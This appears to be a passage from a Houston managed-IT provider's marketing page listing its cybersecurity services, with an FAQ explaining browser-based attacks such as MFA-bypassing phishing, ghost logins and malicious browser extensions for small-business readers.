The threats outlined in this report aren't limited to enterprises with dedicated security teams. Small and mid-sized businesses in Houston are targeted by the same attack techniques - often more aggressively because attackers know defenses are thinner. CinchOps helps businesses with 10-200 employees close these gaps with managed cybersecurity and IT support designed for the browser-first threat environment.

  • Phishing-resistant authentication deployment: CinchOps helps businesses move beyond basic MFA to phishing-resistant methods where supported, while implementing layered controls for applications that don't yet support them.
  • SSO and ghost login auditing: We identify shadow IT and ghost logins across your SaaS environment - finding the backup authentication paths that attackers exploit but that don't appear in your identity provider logs.
  • Browser extension management: CinchOps establishes policies and monitoring for browser extensions, blocking known-malicious extensions and flagging risky permissions before they become a problem.
  • Credential monitoring and breach exposure checks: We proactively check employee credentials against known breach databases and dark web feeds, flagging compromised and reused passwords before attackers use them.
  • Security awareness training for modern threats: Traditional phishing training doesn't cover OAuth consent attacks, ClickFix fake CAPTCHAs, or browser extension compromises. CinchOps delivers training that addresses the threats your team actually faces today.
  • Cloud application security posture management: We audit and harden your Microsoft 365, Google Workspace, and SaaS configurations to limit OAuth app permissions, enforce conditional access policies, and reduce the blast radius of any account compromise.
  • Incident detection and response: CinchOps monitors for signs of browser-based compromise, including unusual session activity, unauthorized OAuth grants, and credential abuse across your cloud environment.

Browser-based attacks are the primary threat vector for 2026. With CinchOps as your managed IT services provider in Houston and Katy, you don't need an in-house security team to defend against them. You need a partner who understands how these attacks work and has the tools and processes to stop them.

Frequently Asked Questions

What is a browser-based attack and why should Houston businesses care?

A browser-based attack is a cyberattack that happens entirely within the web browser rather than targeting the endpoint device. Attackers use techniques like phishing, session hijacking, and malicious extensions to steal credentials and access cloud applications. Houston businesses should care because over 85% of modern work happens in the browser, making it the primary target for data theft and extortion.

Can MFA protect my business from all phishing attacks?

No. Adversary-in-the-Middle (AitM) phishing attacks bypass MFA by intercepting session tokens in real time as the victim authenticates. OAuth-based attacks bypass MFA entirely by exploiting app authorization flows that don't require a standard login. While MFA is still a critical security layer, it needs to be combined with browser-level security, conditional access policies, and phishing-resistant authentication methods for full protection.

What are ghost logins and how do I find them?

Ghost logins are backup authentication methods - usually password-based logins - that exist alongside SSO for SaaS applications. They're created when users register for an app with a password before SSO is configured, and the original credential remains valid. Ghost logins don't appear in identity provider logs, making them invisible to standard security monitoring. A managed IT provider like CinchOps can audit your SaaS environment to identify and remediate these hidden access points.

How do malicious browser extensions get past security reviews?

Attackers use several methods to bypass extension store security checks. They start with legitimate extensions and push malicious updates after reaching a target install count. They use dynamically compiled code that loads payloads from remote servers at runtime, so the extension code itself appears clean during static analysis. Some malicious extensions wait 48 hours between server check-ins and only activate their payload 10% of the time, making behavioral detection extremely difficult.

What is the best way for a small business to defend against browser-based attacks?

Small businesses should take a layered approach: deploy phishing-resistant authentication where possible, audit all SaaS applications for ghost logins and missing MFA, implement browser extension management policies, monitor employee credentials against known breach databases, and train employees on modern phishing techniques beyond just email. Working with a managed IT services provider that specializes in cybersecurity gives small businesses access to enterprise-grade defenses without the cost of an in-house security team.
